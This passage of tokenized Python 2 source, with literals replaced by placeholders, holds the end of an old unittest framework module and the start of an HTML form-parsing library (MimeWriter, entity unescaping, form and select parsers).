addTest ( test ) <EOL> def run ( self , result ) : <EOL> for test in self . _tests : <EOL> if result . shouldStop : <EOL> break <EOL> test ( result ) <EOL> return result <EOL> def __call__ ( self , * args , ** kwds ) : <EOL> return self . run ( * args , ** kwds ) <EOL> def debug ( self ) : <EOL> """<STR_LIT>""" <EOL> for test in self . _tests : test . debug ( ) <EOL> class FunctionTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , testFunc , setUp = None , tearDown = None , <EOL> description = None ) : <EOL> TestCase . __init__ ( self ) <EOL> self . __setUpFunc = setUp <EOL> self . __tearDownFunc = tearDown <EOL> self . __testFunc = testFunc <EOL> self . __description = description <EOL> def setUp ( self ) : <EOL> if self . __setUpFunc is not None : <EOL> self . __setUpFunc ( ) <EOL> def tearDown ( self ) : <EOL> if self . __tearDownFunc is not None : <EOL> self . __tearDownFunc ( ) <EOL> def runTest ( self ) : <EOL> self . __testFunc ( ) <EOL> def id ( self ) : <EOL> return self . __testFunc . __name__ <EOL> def __eq__ ( self , other ) : <EOL> if type ( self ) is not type ( other ) : <EOL> return False <EOL> return self . __setUpFunc == other . __setUpFunc and self . __tearDownFunc == other . __tearDownFunc and self . __testFunc == other . __testFunc and self . __description == other . __description <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __hash__ ( self ) : <EOL> return hash ( ( type ( self ) , self . __setUpFunc , self . __tearDownFunc , <EOL> self . __testFunc , self . __description ) ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . __testFunc . __name__ ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . __testFunc ) <EOL> def shortDescription ( self ) : <EOL> if self . __description is not None : return self . __description <EOL> doc = self . __testFunc . __doc__ <EOL> return doc and doc . 
split ( "<STR_LIT:\n>" ) [ <NUM_LIT:0> ] . strip ( ) or None <EOL> class TestLoader : <EOL> """<STR_LIT>""" <EOL> testMethodPrefix = '<STR_LIT:test>' <EOL> sortTestMethodsUsing = cmp <EOL> suiteClass = TestSuite <EOL> def loadTestsFromTestCase ( self , testCaseClass ) : <EOL> """<STR_LIT>""" <EOL> if issubclass ( testCaseClass , TestSuite ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> testCaseNames = self . getTestCaseNames ( testCaseClass ) <EOL> if not testCaseNames and hasattr ( testCaseClass , '<STR_LIT>' ) : <EOL> testCaseNames = [ '<STR_LIT>' ] <EOL> return self . suiteClass ( map ( testCaseClass , testCaseNames ) ) <EOL> def loadTestsFromModule ( self , module ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ] <EOL> for name in dir ( module ) : <EOL> obj = getattr ( module , name ) <EOL> if ( isinstance ( obj , ( type , types . ClassType ) ) and <EOL> issubclass ( obj , TestCase ) ) : <EOL> tests . append ( self . loadTestsFromTestCase ( obj ) ) <EOL> return self . suiteClass ( tests ) <EOL> def loadTestsFromName ( self , name , module = None ) : <EOL> """<STR_LIT>""" <EOL> parts = name . split ( '<STR_LIT:.>' ) <EOL> if module is None : <EOL> parts_copy = parts [ : ] <EOL> while parts_copy : <EOL> try : <EOL> module = __import__ ( '<STR_LIT:.>' . join ( parts_copy ) ) <EOL> break <EOL> except ImportError : <EOL> del parts_copy [ - <NUM_LIT:1> ] <EOL> if not parts_copy : raise <EOL> parts = parts [ <NUM_LIT:1> : ] <EOL> obj = module <EOL> for part in parts : <EOL> parent , obj = obj , getattr ( obj , part ) <EOL> if type ( obj ) == types . ModuleType : <EOL> return self . loadTestsFromModule ( obj ) <EOL> elif ( isinstance ( obj , ( type , types . ClassType ) ) and <EOL> issubclass ( obj , TestCase ) ) : <EOL> return self . loadTestsFromTestCase ( obj ) <EOL> elif ( type ( obj ) == types . UnboundMethodType and <EOL> isinstance ( parent , ( type , types . ClassType ) ) and <EOL> issubclass ( parent , TestCase ) ) : <EOL> return TestSuite ( [ parent ( obj . 
__name__ ) ] ) <EOL> elif isinstance ( obj , TestSuite ) : <EOL> return obj <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> test = obj ( ) <EOL> if isinstance ( test , TestSuite ) : <EOL> return test <EOL> elif isinstance ( test , TestCase ) : <EOL> return TestSuite ( [ test ] ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % <EOL> ( obj , test ) ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % obj ) <EOL> def loadTestsFromNames ( self , names , module = None ) : <EOL> """<STR_LIT>""" <EOL> suites = [ self . loadTestsFromName ( name , module ) for name in names ] <EOL> return self . suiteClass ( suites ) <EOL> def getTestCaseNames ( self , testCaseClass ) : <EOL> """<STR_LIT>""" <EOL> def isTestMethod ( attrname , testCaseClass = testCaseClass , prefix = self . testMethodPrefix ) : <EOL> return attrname . startswith ( prefix ) and hasattr ( getattr ( testCaseClass , attrname ) , '<STR_LIT>' ) <EOL> testFnNames = filter ( isTestMethod , dir ( testCaseClass ) ) <EOL> if self . sortTestMethodsUsing : <EOL> testFnNames . sort ( key = _CmpToKey ( self . sortTestMethodsUsing ) ) <EOL> return testFnNames <EOL> defaultTestLoader = TestLoader ( ) <EOL> def _makeLoader ( prefix , sortUsing , suiteClass = None ) : <EOL> loader = TestLoader ( ) <EOL> loader . sortTestMethodsUsing = sortUsing <EOL> loader . testMethodPrefix = prefix <EOL> if suiteClass : loader . suiteClass = suiteClass <EOL> return loader <EOL> def getTestCaseNames ( testCaseClass , prefix , sortUsing = cmp ) : <EOL> return _makeLoader ( prefix , sortUsing ) . getTestCaseNames ( testCaseClass ) <EOL> def makeSuite ( testCaseClass , prefix = '<STR_LIT:test>' , sortUsing = cmp , suiteClass = TestSuite ) : <EOL> return _makeLoader ( prefix , sortUsing , suiteClass ) . loadTestsFromTestCase ( testCaseClass ) <EOL> def findTestCases ( module , prefix = '<STR_LIT:test>' , sortUsing = cmp , suiteClass = TestSuite ) : <EOL> return _makeLoader ( prefix , sortUsing , suiteClass ) . 
loadTestsFromModule ( module ) <EOL> class _WritelnDecorator : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> self . stream = stream <EOL> def __getattr__ ( self , attr ) : <EOL> return getattr ( self . stream , attr ) <EOL> def writeln ( self , arg = None ) : <EOL> if arg : self . write ( arg ) <EOL> self . write ( '<STR_LIT:\n>' ) <EOL> class _TextTestResult ( TestResult ) : <EOL> """<STR_LIT>""" <EOL> separator1 = '<STR_LIT:=>' * <NUM_LIT> <EOL> separator2 = '<STR_LIT:->' * <NUM_LIT> <EOL> def __init__ ( self , stream , descriptions , verbosity ) : <EOL> TestResult . __init__ ( self ) <EOL> self . stream = stream <EOL> self . showAll = verbosity > <NUM_LIT:1> <EOL> self . dots = verbosity == <NUM_LIT:1> <EOL> self . descriptions = descriptions <EOL> def getDescription ( self , test ) : <EOL> if self . descriptions : <EOL> return test . shortDescription ( ) or str ( test ) <EOL> else : <EOL> return str ( test ) <EOL> def startTest ( self , test ) : <EOL> TestResult . startTest ( self , test ) <EOL> if self . showAll : <EOL> self . stream . write ( self . getDescription ( test ) ) <EOL> self . stream . write ( "<STR_LIT>" ) <EOL> self . stream . flush ( ) <EOL> def addSuccess ( self , test ) : <EOL> TestResult . addSuccess ( self , test ) <EOL> if self . showAll : <EOL> self . stream . writeln ( "<STR_LIT>" ) <EOL> elif self . dots : <EOL> self . stream . write ( '<STR_LIT:.>' ) <EOL> self . stream . flush ( ) <EOL> def addError ( self , test , err ) : <EOL> TestResult . addError ( self , test , err ) <EOL> if self . showAll : <EOL> self . stream . writeln ( "<STR_LIT>" ) <EOL> elif self . dots : <EOL> self . stream . write ( '<STR_LIT:E>' ) <EOL> self . stream . flush ( ) <EOL> def addFailure ( self , test , err ) : <EOL> TestResult . addFailure ( self , test , err ) <EOL> if self . showAll : <EOL> self . stream . writeln ( "<STR_LIT>" ) <EOL> elif self . dots : <EOL> self . stream . write ( '<STR_LIT:F>' ) <EOL> self . stream . 
flush ( ) <EOL> def printErrors ( self ) : <EOL> if self . dots or self . showAll : <EOL> self . stream . writeln ( ) <EOL> self . printErrorList ( '<STR_LIT>' , self . errors ) <EOL> self . printErrorList ( '<STR_LIT>' , self . failures ) <EOL> def printErrorList ( self , flavour , errors ) : <EOL> for test , err in errors : <EOL> self . stream . writeln ( self . separator1 ) <EOL> self . stream . writeln ( "<STR_LIT>" % ( flavour , self . getDescription ( test ) ) ) <EOL> self . stream . writeln ( self . separator2 ) <EOL> self . stream . writeln ( "<STR_LIT:%s>" % err ) <EOL> class TextTestRunner : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream = sys . stderr , descriptions = <NUM_LIT:1> , verbosity = <NUM_LIT:1> ) : <EOL> self . stream = _WritelnDecorator ( stream ) <EOL> self . descriptions = descriptions <EOL> self . verbosity = verbosity <EOL> def _makeResult ( self ) : <EOL> return _TextTestResult ( self . stream , self . descriptions , self . verbosity ) <EOL> def run ( self , test ) : <EOL> "<STR_LIT>" <EOL> result = self . _makeResult ( ) <EOL> startTime = time . time ( ) <EOL> test ( result ) <EOL> stopTime = time . time ( ) <EOL> timeTaken = stopTime - startTime <EOL> result . printErrors ( ) <EOL> self . stream . writeln ( result . separator2 ) <EOL> run = result . testsRun <EOL> self . stream . writeln ( "<STR_LIT>" % <EOL> ( run , run != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" , timeTaken ) ) <EOL> self . stream . writeln ( ) <EOL> if not result . wasSuccessful ( ) : <EOL> self . stream . write ( "<STR_LIT>" ) <EOL> failed , errored = map ( len , ( result . failures , result . errors ) ) <EOL> if failed : <EOL> self . stream . write ( "<STR_LIT>" % failed ) <EOL> if errored : <EOL> if failed : self . stream . write ( "<STR_LIT:U+002CU+0020>" ) <EOL> self . stream . write ( "<STR_LIT>" % errored ) <EOL> self . stream . writeln ( "<STR_LIT:)>" ) <EOL> else : <EOL> self . stream . 
writeln ( "<STR_LIT:OK>" ) <EOL> return result <EOL> class TestProgram : <EOL> """<STR_LIT>""" <EOL> USAGE = """<STR_LIT>""" <EOL> def __init__ ( self , module = '<STR_LIT:__main__>' , defaultTest = None , <EOL> argv = None , testRunner = TextTestRunner , <EOL> testLoader = defaultTestLoader ) : <EOL> if type ( module ) == type ( '<STR_LIT>' ) : <EOL> self . module = __import__ ( module ) <EOL> for part in module . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] : <EOL> self . module = getattr ( self . module , part ) <EOL> else : <EOL> self . module = module <EOL> if argv is None : <EOL> argv = sys . argv <EOL> self . verbosity = <NUM_LIT:1> <EOL> self . defaultTest = defaultTest <EOL> self . testRunner = testRunner <EOL> self . testLoader = testLoader <EOL> self . progName = os . path . basename ( argv [ <NUM_LIT:0> ] ) <EOL> self . parseArgs ( argv ) <EOL> self . runTests ( ) <EOL> def usageExit ( self , msg = None ) : <EOL> if msg : print msg <EOL> print self . USAGE % self . __dict__ <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def parseArgs ( self , argv ) : <EOL> import getopt <EOL> try : <EOL> options , args = getopt . getopt ( argv [ <NUM_LIT:1> : ] , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> for opt , value in options : <EOL> if opt in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . usageExit ( ) <EOL> if opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . verbosity = <NUM_LIT:0> <EOL> if opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . verbosity = <NUM_LIT:2> <EOL> if len ( args ) == <NUM_LIT:0> and self . defaultTest is None : <EOL> self . test = self . testLoader . loadTestsFromModule ( self . module ) <EOL> return <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> self . testNames = args <EOL> else : <EOL> self . testNames = ( self . defaultTest , ) <EOL> self . createTests ( ) <EOL> except getopt . error , msg : <EOL> self . usageExit ( msg ) <EOL> def createTests ( self ) : <EOL> self . test = self . testLoader . 
loadTestsFromNames ( self . testNames , <EOL> self . module ) <EOL> def runTests ( self ) : <EOL> if isinstance ( self . testRunner , ( type , types . ClassType ) ) : <EOL> try : <EOL> testRunner = self . testRunner ( verbosity = self . verbosity ) <EOL> except TypeError : <EOL> testRunner = self . testRunner ( ) <EOL> else : <EOL> testRunner = self . testRunner <EOL> result = testRunner . run ( self . test ) <EOL> sys . exit ( not result . wasSuccessful ( ) ) <EOL> main = TestProgram <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( module = None ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : True <EOL> except NameError : <EOL> True = <NUM_LIT:1> <EOL> False = <NUM_LIT:0> <EOL> try : bool <EOL> except NameError : <EOL> def bool ( expr ) : <EOL> if expr : return True <EOL> else : return False <EOL> try : <EOL> import logging <EOL> import inspect <EOL> except ImportError : <EOL> def debug ( msg , * args , ** kwds ) : <EOL> pass <EOL> else : <EOL> _logger = logging . getLogger ( "<STR_LIT>" ) <EOL> OPTIMIZATION_HACK = True <EOL> def debug ( msg , * args , ** kwds ) : <EOL> if OPTIMIZATION_HACK : <EOL> return <EOL> caller_name = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:3> ] <EOL> extended_msg = '<STR_LIT>' % msg <EOL> extended_args = ( caller_name , ) + args <EOL> debug = _logger . debug ( extended_msg , * extended_args , ** kwds ) <EOL> def _show_debug_messages ( ) : <EOL> global OPTIMIZATION_HACK <EOL> OPTIMIZATION_HACK = False <EOL> _logger . setLevel ( logging . DEBUG ) <EOL> handler = logging . StreamHandler ( sys . stdout ) <EOL> handler . setLevel ( logging . DEBUG ) <EOL> _logger . addHandler ( handler ) <EOL> import sys , urllib , urllib2 , types , mimetools , copy , urlparse , htmlentitydefs , re , random <EOL> from cStringIO import StringIO <EOL> import sgmllib <EOL> sgmllib . charref = re . 
compile ( "<STR_LIT>" ) <EOL> try : <EOL> import HTMLParser <EOL> except ImportError : <EOL> HAVE_MODULE_HTMLPARSER = False <EOL> else : <EOL> HAVE_MODULE_HTMLPARSER = True <EOL> try : <EOL> import warnings <EOL> except ImportError : <EOL> def deprecation ( message , stack_offset = <NUM_LIT:0> ) : <EOL> pass <EOL> else : <EOL> def deprecation ( message , stack_offset = <NUM_LIT:0> ) : <EOL> warnings . warn ( message , DeprecationWarning , stacklevel = <NUM_LIT:3> + stack_offset ) <EOL> VERSION = "<STR_LIT>" <EOL> CHUNK = <NUM_LIT> <EOL> DEFAULT_ENCODING = "<STR_LIT>" <EOL> class Missing : pass <EOL> _compress_re = re . compile ( r"<STR_LIT>" ) <EOL> def compress_text ( text ) : return _compress_re . sub ( "<STR_LIT:U+0020>" , text . strip ( ) ) <EOL> def normalize_line_endings ( text ) : <EOL> return re . sub ( r"<STR_LIT>" , "<STR_LIT:\r\n>" , text ) <EOL> def urlencode ( query , doseq = False , ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( query , "<STR_LIT>" ) : <EOL> query = query . items ( ) <EOL> else : <EOL> try : <EOL> x = len ( query ) <EOL> if len ( query ) and type ( query [ <NUM_LIT:0> ] ) != types . TupleType : <EOL> raise TypeError ( ) <EOL> except TypeError : <EOL> ty , va , tb = sys . exc_info ( ) <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT:object>" , tb ) <EOL> l = [ ] <EOL> if not doseq : <EOL> for k , v in query : <EOL> k = urllib . quote_plus ( str ( k ) ) <EOL> v = urllib . quote_plus ( str ( v ) ) <EOL> l . append ( k + '<STR_LIT:=>' + v ) <EOL> else : <EOL> for k , v in query : <EOL> k = urllib . quote_plus ( str ( k ) ) <EOL> if type ( v ) == types . StringType : <EOL> v = urllib . quote_plus ( v ) <EOL> l . append ( k + '<STR_LIT:=>' + v ) <EOL> elif type ( v ) == types . UnicodeType : <EOL> v = urllib . quote_plus ( v . encode ( "<STR_LIT>" , "<STR_LIT:replace>" ) ) <EOL> l . append ( k + '<STR_LIT:=>' + v ) <EOL> else : <EOL> try : <EOL> x = len ( v ) <EOL> except TypeError : <EOL> v = urllib . quote_plus ( str ( v ) ) <EOL> l . 
append ( k + '<STR_LIT:=>' + v ) <EOL> else : <EOL> for elt in v : <EOL> l . append ( k + '<STR_LIT:=>' + urllib . quote_plus ( str ( elt ) ) ) <EOL> return '<STR_LIT:&>' . join ( l ) <EOL> def unescape ( data , entities , encoding = DEFAULT_ENCODING ) : <EOL> if data is None or "<STR_LIT:&>" not in data : <EOL> return data <EOL> def replace_entities ( match , entities = entities , encoding = encoding ) : <EOL> ent = match . group ( ) <EOL> if ent [ <NUM_LIT:1> ] == "<STR_LIT:#>" : <EOL> return unescape_charref ( ent [ <NUM_LIT:2> : - <NUM_LIT:1> ] , encoding ) <EOL> repl = entities . get ( ent ) <EOL> if repl is not None : <EOL> if type ( repl ) != type ( "<STR_LIT>" ) : <EOL> try : <EOL> repl = repl . encode ( encoding ) <EOL> except UnicodeError : <EOL> repl = ent <EOL> else : <EOL> repl = ent <EOL> return repl <EOL> return re . sub ( r"<STR_LIT>" , replace_entities , data ) <EOL> def unescape_charref ( data , encoding ) : <EOL> name , base = data , <NUM_LIT:10> <EOL> if name . startswith ( "<STR_LIT:x>" ) : <EOL> name , base = name [ <NUM_LIT:1> : ] , <NUM_LIT:16> <EOL> uc = unichr ( int ( name , base ) ) <EOL> if encoding is None : <EOL> return uc <EOL> else : <EOL> try : <EOL> repl = uc . encode ( encoding ) <EOL> except UnicodeError : <EOL> repl = "<STR_LIT>" % data <EOL> return repl <EOL> def get_entitydefs ( ) : <EOL> import htmlentitydefs <EOL> from codecs import latin_1_decode <EOL> entitydefs = { } <EOL> try : <EOL> htmlentitydefs . name2codepoint <EOL> except AttributeError : <EOL> entitydefs = { } <EOL> for name , char in htmlentitydefs . entitydefs . items ( ) : <EOL> uc = latin_1_decode ( char ) [ <NUM_LIT:0> ] <EOL> if uc . startswith ( "<STR_LIT>" ) and uc . endswith ( "<STR_LIT:;>" ) : <EOL> uc = unescape_charref ( uc [ <NUM_LIT:2> : - <NUM_LIT:1> ] , None ) <EOL> entitydefs [ "<STR_LIT>" % name ] = uc <EOL> else : <EOL> for name , codepoint in htmlentitydefs . name2codepoint . 
items ( ) : <EOL> entitydefs [ "<STR_LIT>" % name ] = unichr ( codepoint ) <EOL> return entitydefs <EOL> def issequence ( x ) : <EOL> try : <EOL> x [ <NUM_LIT:0> ] <EOL> except ( TypeError , KeyError ) : <EOL> return False <EOL> except IndexError : <EOL> pass <EOL> return True <EOL> def isstringlike ( x ) : <EOL> try : x + "<STR_LIT>" <EOL> except : return False <EOL> else : return True <EOL> def choose_boundary ( ) : <EOL> """<STR_LIT>""" <EOL> nonce = "<STR_LIT>" . join ( [ str ( random . randint ( <NUM_LIT:0> , sys . maxint - <NUM_LIT:1> ) ) for i in <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> return "<STR_LIT:->" * <NUM_LIT> + nonce <EOL> class MimeWriter : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , fp , http_hdrs = None ) : <EOL> self . _http_hdrs = http_hdrs <EOL> self . _fp = fp <EOL> self . _headers = [ ] <EOL> self . _boundary = [ ] <EOL> self . _first_part = True <EOL> def addheader ( self , key , value , prefix = <NUM_LIT:0> , <EOL> add_to_http_hdrs = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> lines = value . split ( "<STR_LIT:\r\n>" ) <EOL> while lines and not lines [ - <NUM_LIT:1> ] : del lines [ - <NUM_LIT:1> ] <EOL> while lines and not lines [ <NUM_LIT:0> ] : del lines [ <NUM_LIT:0> ] <EOL> if add_to_http_hdrs : <EOL> value = "<STR_LIT>" . join ( lines ) <EOL> self . _http_hdrs . append ( ( key . capitalize ( ) , value ) ) <EOL> else : <EOL> for i in range ( <NUM_LIT:1> , len ( lines ) ) : <EOL> lines [ i ] = "<STR_LIT:U+0020>" + lines [ i ] . strip ( ) <EOL> value = "<STR_LIT:\r\n>" . join ( lines ) + "<STR_LIT:\r\n>" <EOL> line = key . title ( ) + "<STR_LIT>" + value <EOL> if prefix : <EOL> self . _headers . insert ( <NUM_LIT:0> , line ) <EOL> else : <EOL> self . _headers . append ( line ) <EOL> def flushheaders ( self ) : <EOL> self . _fp . writelines ( self . _headers ) <EOL> self . 
_headers = [ ] <EOL> def startbody ( self , ctype = None , plist = [ ] , prefix = <NUM_LIT:1> , <EOL> add_to_http_hdrs = <NUM_LIT:0> , content_type = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> if content_type and ctype : <EOL> for name , value in plist : <EOL> ctype = ctype + '<STR_LIT>' % ( name , value ) <EOL> self . addheader ( "<STR_LIT:Content-Type>" , ctype , prefix = prefix , <EOL> add_to_http_hdrs = add_to_http_hdrs ) <EOL> self . flushheaders ( ) <EOL> if not add_to_http_hdrs : self . _fp . write ( "<STR_LIT:\r\n>" ) <EOL> self . _first_part = True <EOL> return self . _fp <EOL> def startmultipartbody ( self , subtype , boundary = None , plist = [ ] , prefix = <NUM_LIT:1> , <EOL> add_to_http_hdrs = <NUM_LIT:0> , content_type = <NUM_LIT:1> ) : <EOL> boundary = boundary or choose_boundary ( ) <EOL> self . _boundary . append ( boundary ) <EOL> return self . startbody ( "<STR_LIT>" + subtype , <EOL> [ ( "<STR_LIT>" , boundary ) ] + plist , <EOL> prefix = prefix , <EOL> add_to_http_hdrs = add_to_http_hdrs , <EOL> content_type = content_type ) <EOL> def nextpart ( self ) : <EOL> boundary = self . _boundary [ - <NUM_LIT:1> ] <EOL> if self . _first_part : <EOL> self . _first_part = False <EOL> else : <EOL> self . _fp . write ( "<STR_LIT:\r\n>" ) <EOL> self . _fp . write ( "<STR_LIT>" + boundary + "<STR_LIT:\r\n>" ) <EOL> return self . __class__ ( self . _fp ) <EOL> def lastpart ( self ) : <EOL> if self . _first_part : <EOL> self . nextpart ( ) <EOL> boundary = self . _boundary . pop ( ) <EOL> self . _fp . write ( "<STR_LIT>" + boundary + "<STR_LIT>" ) <EOL> class LocateError ( ValueError ) : pass <EOL> class AmbiguityError ( LocateError ) : pass <EOL> class ControlNotFoundError ( LocateError ) : pass <EOL> class ItemNotFoundError ( LocateError ) : pass <EOL> class ItemCountError ( ValueError ) : pass <EOL> if HAVE_MODULE_HTMLPARSER : <EOL> SGMLLIB_PARSEERROR = sgmllib . SGMLParseError <EOL> class ParseError ( sgmllib . SGMLParseError , <EOL> HTMLParser . 
HTMLParseError , <EOL> ) : <EOL> pass <EOL> else : <EOL> if hasattr ( sgmllib , "<STR_LIT>" ) : <EOL> SGMLLIB_PARSEERROR = sgmllib . SGMLParseError <EOL> class ParseError ( sgmllib . SGMLParseError ) : <EOL> pass <EOL> else : <EOL> SGMLLIB_PARSEERROR = RuntimeError <EOL> class ParseError ( RuntimeError ) : <EOL> pass <EOL> class _AbstractFormParser : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> if entitydefs is None : <EOL> entitydefs = get_entitydefs ( ) <EOL> self . _entitydefs = entitydefs <EOL> self . _encoding = encoding <EOL> self . base = None <EOL> self . forms = [ ] <EOL> self . labels = [ ] <EOL> self . _current_label = None <EOL> self . _current_form = None <EOL> self . _select = None <EOL> self . _optgroup = None <EOL> self . _option = None <EOL> self . _textarea = None <EOL> self . _global_form = None <EOL> self . start_form ( [ ] ) <EOL> self . end_form ( ) <EOL> self . _current_form = self . _global_form = self . forms [ <NUM_LIT:0> ] <EOL> def do_base ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> for key , value in attrs : <EOL> if key == "<STR_LIT>" : <EOL> self . base = self . unescape_attr_if_required ( value ) <EOL> def end_body ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _current_label is not None : <EOL> self . end_label ( ) <EOL> if self . _current_form is not self . _global_form : <EOL> self . end_form ( ) <EOL> def start_form ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _current_form is not self . _global_form : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> name = None <EOL> action = None <EOL> enctype = "<STR_LIT>" <EOL> method = "<STR_LIT:GET>" <EOL> d = { } <EOL> for key , value in attrs : <EOL> if key == "<STR_LIT:name>" : <EOL> name = self . unescape_attr_if_required ( value ) <EOL> elif key == "<STR_LIT:action>" : <EOL> action = self . 
unescape_attr_if_required ( value ) <EOL> elif key == "<STR_LIT>" : <EOL> method = self . unescape_attr_if_required ( value . upper ( ) ) <EOL> elif key == "<STR_LIT>" : <EOL> enctype = self . unescape_attr_if_required ( value . lower ( ) ) <EOL> d [ key ] = self . unescape_attr_if_required ( value ) <EOL> controls = [ ] <EOL> self . _current_form = ( name , action , method , enctype ) , d , controls <EOL> def end_form ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _current_label is not None : <EOL> self . end_label ( ) <EOL> if self . _current_form is self . _global_form : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> self . forms . append ( self . _current_form ) <EOL> self . _current_form = self . _global_form <EOL> def start_select ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _select is not None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> if self . _textarea is not None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> self . _select = d <EOL> self . _add_label ( d ) <EOL> self . _append_select_control ( { "<STR_LIT>" : d } ) <EOL> def end_select ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _select is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> if self . _option is not None : <EOL> self . _end_option ( ) <EOL> self . _select = None <EOL> def start_optgroup ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _select is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> self . _optgroup = d <EOL> def end_optgroup ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _optgroup is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> self . _optgroup = None <EOL> def _start_option ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . 
_select is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> if self . _option is not None : <EOL> self . _end_option ( ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> self . _option = { } <EOL> self . _option . update ( d ) <EOL> if ( self . _optgroup and self . _optgroup . has_key ( "<STR_LIT>" ) and <EOL> not self . _option . has_key ( "<STR_LIT>" ) ) : <EOL> self . _option [ "<STR_LIT>" ] = None <EOL> def _end_option ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _option is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> contents = self . _option . get ( "<STR_LIT>" , "<STR_LIT>" ) . strip ( ) <EOL> self . _option [ "<STR_LIT>" ] = contents <EOL> if not self . _option . has_key ( "<STR_LIT:value>" ) : <EOL> self . _option [ "<STR_LIT:value>" ] = contents <EOL> if not self . _option . has_key ( "<STR_LIT:label>" ) : <EOL> self . _option [ "<STR_LIT:label>" ] = contents <EOL> self . _option [ "<STR_LIT>" ] = self . _select <EOL> self . _append_select_control ( self . _option ) <EOL> self . _option = None <EOL> def _append_select_control ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> name = self . _select . get ( "<STR_LIT:name>" ) <EOL> controls . append ( ( "<STR_LIT>" , name , attrs ) ) <EOL> def start_textarea ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _textarea is not None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> if self . _select is not None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> self . _add_label ( d ) <EOL> self . _textarea = d <EOL> def end_textarea ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _textarea is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> name = self . _textarea . 
